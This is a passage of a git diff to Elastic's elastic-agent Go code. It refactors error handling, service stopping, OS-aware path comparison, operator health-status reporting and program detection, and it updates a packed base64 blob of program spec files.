nil { + if e.msg != "" { + return e.msg + } + return "unknown error" + } if e.msg != "" { return errors.Wrap(e.err, e.msg).Error() } diff --git a/x-pack/elastic-agent/pkg/agent/errors/error_test.go b/x-pack/elastic-agent/pkg/agent/errors/error_test.go index faee302b8a04..161120daf4be 100644 --- a/x-pack/elastic-agent/pkg/agent/errors/error_test.go +++ b/x-pack/elastic-agent/pkg/agent/errors/error_test.go @@ -7,7 +7,6 @@ package errors import ( "fmt" "io" - "strings" "testing" "github.com/pkg/errors" @@ -146,48 +145,6 @@ func TestErrors(t *testing.T) { } } -func TestNoErrorNoMsg(t *testing.T) { - actualErr := New() - agentErr, ok := actualErr.(Error) - if !ok { - t.Error("expected Error") - return - } - - e := agentErr.Error() - if !strings.Contains(e, "error_test.go[") { - t.Errorf("Error does not contain source file: %v", e) - } - - if !strings.HasSuffix(e, ": unknown error") { - t.Errorf("Error does not contain default error: %v", e) - } -} - -func TestNoError(t *testing.T) { - // test with message - msg := "msg2" - actualErr := New(msg) - agentErr, ok := actualErr.(Error) - if !ok { - t.Error("expected Error") - return - } - - e := agentErr.Error() - if !strings.Contains(e, "error_test.go[") { - t.Errorf("Error does not contain source file: %v", e) - } - - if !strings.HasSuffix(e, ": unknown error") { - t.Errorf("Error does not contain default error: %v", e) - } - - if !strings.HasPrefix(e, msg) { - t.Errorf("Error does not contain provided message: %v", e) - } -} - func TestMetaFold(t *testing.T) { err1 := fmt.Errorf("level1") err2 := New("level2", err1, M("key1", "level2"), M("key2", "level2")) diff --git a/x-pack/elastic-agent/pkg/agent/errors/generators.go b/x-pack/elastic-agent/pkg/agent/errors/generators.go index 26a067f4ce86..ce9e1961d3b9 100644 --- a/x-pack/elastic-agent/pkg/agent/errors/generators.go +++ b/x-pack/elastic-agent/pkg/agent/errors/generators.go @@ -4,13 +4,6 @@ package errors -import ( - "fmt" - "runtime" - - "github.com/pkg/errors" -) - // M creates a meta entry for an error func M(key string, val interface{}) MetaRecord { return MetaRecord{key: key, @@ -43,13 +36,5 @@ func New(args ...interface{}) error { } } - if agentErr.err == nil { - agentErr.err = errors.New("unknown error") - - if _, file, line, ok := runtime.Caller(1); ok { - agentErr.err = errors.Wrapf(agentErr.err, fmt.Sprintf("%s[%d]", file, line)) - } - } - return agentErr } diff --git a/x-pack/elastic-agent/pkg/agent/install/install.go b/x-pack/elastic-agent/pkg/agent/install/install.go index 01b9bd6f6166..3e7df33ccd7f 100644 --- a/x-pack/elastic-agent/pkg/agent/install/install.go +++ b/x-pack/elastic-agent/pkg/agent/install/install.go @@ -104,6 +104,22 @@ func StartService() error { return nil } +// StopService stops the installed service. +func StopService() error { + svc, err := newService() + if err != nil { + return err + } + err = svc.Stop() + if err != nil { + return errors.New( + err, + fmt.Sprintf("failed to stop service (%s)", ServiceName), + errors.M("service", ServiceName)) + } + return nil +} + // findDirectory returns the directory to copy into the installation location. // // This also verifies that the discovered directory is a valid directory for installation. diff --git a/x-pack/elastic-agent/pkg/agent/install/installed.go b/x-pack/elastic-agent/pkg/agent/install/installed.go index 9f294078242d..cc39bc15eac8 100644 --- a/x-pack/elastic-agent/pkg/agent/install/installed.go +++ b/x-pack/elastic-agent/pkg/agent/install/installed.go @@ -58,7 +58,7 @@ func RunningInstalled() bool { execDir = filepath.Dir(filepath.Dir(execDir)) execPath = filepath.Join(execDir, execName) } - return expected == execPath + return ArePathsEqual(expected, execPath) } // checkService only checks the status of the service. diff --git a/x-pack/elastic-agent/pkg/agent/install/paths.go b/x-pack/elastic-agent/pkg/agent/install/paths.go index 5936c31926ab..b6dc11fb4900 100644 --- a/x-pack/elastic-agent/pkg/agent/install/paths.go +++ b/x-pack/elastic-agent/pkg/agent/install/paths.go @@ -28,3 +28,8 @@ const ( exec /opt/Elastic/Agent/elastic-agent $@ ` ) + +// ArePathsEqual determines whether paths are equal taking case sensitivity of os into account. +func ArePathsEqual(expected, actual string) bool { + return expected == actual +} diff --git a/x-pack/elastic-agent/pkg/agent/install/paths_darwin.go b/x-pack/elastic-agent/pkg/agent/install/paths_darwin.go index f6ebcdfdbae9..3205116951cd 100644 --- a/x-pack/elastic-agent/pkg/agent/install/paths_darwin.go +++ b/x-pack/elastic-agent/pkg/agent/install/paths_darwin.go @@ -27,3 +27,8 @@ const ( exec /Library/Elastic/Agent/elastic-agent $@ ` ) + +// ArePathsEqual determines whether paths are equal taking case sensitivity of os into account. +func ArePathsEqual(expected, actual string) bool { + return expected == actual +} diff --git a/x-pack/elastic-agent/pkg/agent/install/paths_test.go b/x-pack/elastic-agent/pkg/agent/install/paths_test.go new file mode 100644 index 000000000000..68bfcc6b69bf --- /dev/null +++ b/x-pack/elastic-agent/pkg/agent/install/paths_test.go @@ -0,0 +1,33 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package install + +import ( + "runtime" + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestEqual(t *testing.T) { + isWindows := runtime.GOOS == "windows" + testCases := []struct { + Name string + Expected string + Actual string + ShouldMatch bool + }{ + {"different paths", "/var/path/a", "/var/path/b", false}, + {"strictly same paths", "/var/path/a", "/var/path/a", true}, + {"strictly same win paths", `C:\Program Files\Elastic\Agent`, `C:\Program Files\Elastic\Agent`, true}, + {"case insensitive win paths", `C:\Program Files\Elastic\Agent`, `c:\Program Files\Elastic\Agent`, isWindows}, + } + + for _, tc := range testCases { + t.Run(tc.Name, func(t *testing.T) { + assert.Equal(t, tc.ShouldMatch, ArePathsEqual(tc.Expected, tc.Actual)) + }) + } +} diff --git a/x-pack/elastic-agent/pkg/agent/install/paths_windows.go b/x-pack/elastic-agent/pkg/agent/install/paths_windows.go index 3af4c79d9415..d068fc0c40ad 100644 --- a/x-pack/elastic-agent/pkg/agent/install/paths_windows.go +++ b/x-pack/elastic-agent/pkg/agent/install/paths_windows.go @@ -6,6 +6,8 @@ package install +import "strings" + const ( // BinaryName is the name of the installed binary. BinaryName = "elastic-agent.exe" @@ -25,3 +27,8 @@ const ( // ShellWrapper is the wrapper that is installed. ShellWrapper = "" // no wrapper on Windows ) + +// ArePathsEqual determines whether paths are equal taking case sensitivity of os into account. +func ArePathsEqual(expected, actual string) bool { + return strings.EqualFold(expected, actual) +} diff --git a/x-pack/elastic-agent/pkg/agent/operation/operator.go b/x-pack/elastic-agent/pkg/agent/operation/operator.go index 49df45071ced..a95bfe5b165d 100644 --- a/x-pack/elastic-agent/pkg/agent/operation/operator.go +++ b/x-pack/elastic-agent/pkg/agent/operation/operator.go @@ -103,7 +103,7 @@ func NewOperator( reporter: reporter, monitor: monitor, statusController: statusController, - statusReporter: statusController.Register("operator-" + pipelineID), + statusReporter: statusController.RegisterComponent("operator-" + pipelineID), } operator.initHandlerMap() @@ -142,7 +142,7 @@ func (o *Operator) Close() error { func (o *Operator) HandleConfig(cfg configrequest.Request) error { _, stateID, steps, ack, err := o.stateResolver.Resolve(cfg) if err != nil { - o.statusReporter.Update(status.Failed) + o.statusReporter.Update(state.Failed, err.Error()) return errors.New(err, errors.TypeConfig, fmt.Sprintf("operator: failed to resolve configuration %s, error: %v", cfg, err)) } o.statusController.UpdateStateID(stateID) @@ -151,8 +151,9 @@ func (o *Operator) HandleConfig(cfg configrequest.Request) error { if strings.ToLower(step.ProgramSpec.Cmd) != strings.ToLower(monitoringName) { if _, isSupported := program.SupportedMap[strings.ToLower(step.ProgramSpec.Cmd)]; !isSupported { // mark failed, new config cannot be run - o.statusReporter.Update(status.Failed) - return errors.New(fmt.Sprintf("program '%s' is not supported", step.ProgramSpec.Cmd), + msg := fmt.Sprintf("program '%s' is not supported", step.ProgramSpec.Cmd) + o.statusReporter.Update(state.Failed, msg) + return errors.New(msg, errors.TypeApplication, errors.M(errors.MetaKeyAppName, step.ProgramSpec.Cmd)) } @@ -160,18 +161,20 @@ func (o *Operator) HandleConfig(cfg configrequest.Request) error { handler, found := o.handlers[step.ID] if !found { - o.statusReporter.Update(status.Failed) - return errors.New(fmt.Sprintf("operator: received unexpected event '%s'", step.ID), errors.TypeConfig) + msg := fmt.Sprintf("operator: received unexpected event '%s'", step.ID) + o.statusReporter.Update(state.Failed, msg) + return errors.New(msg, errors.TypeConfig) } if err := handler(step); err != nil { - o.statusReporter.Update(status.Failed) - return errors.New(err, errors.TypeConfig, fmt.Sprintf("operator: failed to execute step %s, error: %v", step.ID, err)) + msg := fmt.Sprintf("operator: failed to execute step %s, error: %v", step.ID, err) + o.statusReporter.Update(state.Failed, msg) + return errors.New(err, errors.TypeConfig, msg) } } // Ack the resolver should state for next call. - o.statusReporter.Update(status.Healthy) + o.statusReporter.Update(state.Healthy, "") ack() return nil diff --git a/x-pack/elastic-agent/pkg/agent/operation/operator_test.go b/x-pack/elastic-agent/pkg/agent/operation/operator_test.go index a7a3547fa88a..8966ca9a516b 100644 --- a/x-pack/elastic-agent/pkg/agent/operation/operator_test.go +++ b/x-pack/elastic-agent/pkg/agent/operation/operator_test.go @@ -79,7 +79,7 @@ func TestConfigurableRun(t *testing.T) { if !ok { return fmt.Errorf("no state for process") } - if item.Status != state.Running { + if item.Status != state.Healthy { return fmt.Errorf("process never went to running") } return nil @@ -112,7 +112,7 @@ func TestConfigurableRun(t *testing.T) { items := operator.State() item0, ok := items[p.ID()] - if !ok || item0.Status != state.Running { + if !ok || item0.Status != state.Healthy { t.Fatalf("Process no longer running after config %#v", items) } pid := item0.ProcessInfo.PID @@ -154,7 +154,7 @@ func TestConfigurableFailed(t *testing.T) { if !ok { return fmt.Errorf("no state for process") } - if item.Status != state.Running { + if item.Status != state.Healthy { return fmt.Errorf("process never went to running") } pid = item.ProcessInfo.PID @@ -194,7 +194,7 @@ func TestConfigurableFailed(t *testing.T) { if !ok { return fmt.Errorf("no state for process") } - if item.Status == state.Running { + if item.Status == state.Healthy { return fmt.Errorf("process never left running") } return nil @@ -229,7 +229,7 @@ func TestConfigurableFailed(t *testing.T) { if !ok { return fmt.Errorf("no state for process") } - if item.Status != state.Running { + if item.Status != state.Healthy { return fmt.Errorf("process never went to back to running") } return nil @@ -263,7 +263,7 @@ func TestConfigurableCrash(t *testing.T) { if !ok { return fmt.Errorf("no state for process") } - if item.Status != state.Running { + if item.Status != state.Healthy { return fmt.Errorf("process never went to running") } pid = item.ProcessInfo.PID @@ -294,7 +294,7 @@ func TestConfigurableCrash(t *testing.T) { if !ok { return fmt.Errorf("no state for process") } - if item.Status == state.Running { + if item.Status == state.Healthy { return fmt.Errorf("process never left running") } return nil @@ -330,7 +330,7 @@ func TestConfigurableCrash(t *testing.T) { if !ok { return fmt.Errorf("no state for process") } - if item.Status != state.Running { + if item.Status != state.Healthy { return fmt.Errorf("process never went to back to running") } return nil @@ -366,7 +366,7 @@ func TestConfigurableStartStop(t *testing.T) { if !ok { return fmt.Errorf("no state for process") } - if item.Status != state.Running { + if item.Status != state.Healthy { return fmt.Errorf("process never went to running") } return nil @@ -415,7 +415,7 @@ func TestConfigurableService(t *testing.T) { if !ok { return fmt.Errorf("no state for process") } - if item.Status != state.Running { + if item.Status != state.Healthy { return fmt.Errorf("process never went to running") } return nil @@ -448,7 +448,7 @@ func TestConfigurableService(t *testing.T) { items := operator.State() item0, ok := items[p.ID()] - if !ok || item0.Status != state.Running { + if !ok || item0.Status != state.Healthy { t.Fatalf("Process no longer running after config %#v", items) } diff --git a/x-pack/elastic-agent/pkg/agent/program/program.go b/x-pack/elastic-agent/pkg/agent/program/program.go index 87d46bf07a04..7917e1f10533 100644 --- a/x-pack/elastic-agent/pkg/agent/program/program.go +++ b/x-pack/elastic-agent/pkg/agent/program/program.go @@ -55,7 +55,7 @@ func Programs(agentInfo transpiler.AgentInfo, singleConfig *transpiler.AST) (map groupedPrograms := make(map[string][]Program) for k, config := range grouped { - programs, err := detectPrograms(agentInfo, config) + programs, err := DetectPrograms(agentInfo, config) if err != nil { return nil, errors.New(err, errors.TypeConfig, "fail to generate program configuration") } @@ -65,48 +65,18 @@ func Programs(agentInfo transpiler.AgentInfo, singleConfig *transpiler.AST) (map return groupedPrograms, nil } -func detectPrograms(agentInfo transpiler.AgentInfo, singleConfig *transpiler.AST) ([]Program, error) { +// DetectPrograms returns the list of programs detected from the provided configuration. +func DetectPrograms(agentInfo transpiler.AgentInfo, singleConfig *transpiler.AST) ([]Program, error) { programs := make([]Program, 0) for _, spec := range Supported { specificAST := singleConfig.Clone() - if len(spec.Constraints) > 0 { - constraints, err := eql.New(spec.Constraints) - if err != nil { - return nil, err - } - ok, err := constraints.Eval(specificAST) - if err != nil { - return nil, err - } - - if !ok { - continue - } - } - - err := spec.Rules.Apply(agentInfo, specificAST) - if err != nil { - return nil, err - } - - if len(spec.When) == 0 { - return nil, ErrMissingWhen - } - - expression, err := eql.New(spec.When) + ok, err := DetectProgram(spec, agentInfo, specificAST) if err != nil { return nil, err } - - ok, err := expression.Eval(specificAST) - if err != nil { - return nil, err - } - if !ok { continue } - program := Program{ Spec: spec, Config: specificAST, @@ -114,7 +84,42 @@ func detectPrograms(agentInfo transpiler.AgentInfo, singleConfig *transpiler.AST programs = append(programs, program) } return programs, nil +} + +// DetectProgram returns true or false if this program exists in the AST. +// +// Note `ast` is modified to match what the program expects. Should clone the AST before passing to +// this function if you want to still have the original. +func DetectProgram(spec Spec, info transpiler.AgentInfo, ast *transpiler.AST) (bool, error) { + if len(spec.Constraints) > 0 { + constraints, err := eql.New(spec.Constraints) + if err != nil { + return false, err + } + ok, err := constraints.Eval(ast) + if err != nil { + return false, err + } + if !ok { + return false, nil + } + } + + err := spec.Rules.Apply(info, ast) + if err != nil { + return false, err + } + + if len(spec.When) == 0 { + return false, ErrMissingWhen + } + + expression, err := eql.New(spec.When) + if err != nil { + return false, err + } + return expression.Eval(ast) } // KnownProgramNames returns a list of runnable programs by the elastic-agent. diff --git a/x-pack/elastic-agent/pkg/agent/program/supported.go b/x-pack/elastic-agent/pkg/agent/program/supported.go index 3ad9fbb84636..85522517c164 100644 --- a/x-pack/elastic-agent/pkg/agent/program/supported.go +++ b/x-pack/elastic-agent/pkg/agent/program/supported.go @@ -24,7 +24,7 @@ func init() { // spec/heartbeat.yml // spec/metricbeat.yml // spec/packetbeat.yml - unpacked := packer.MustUnpack("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") + unpacked := packer.MustUnpack("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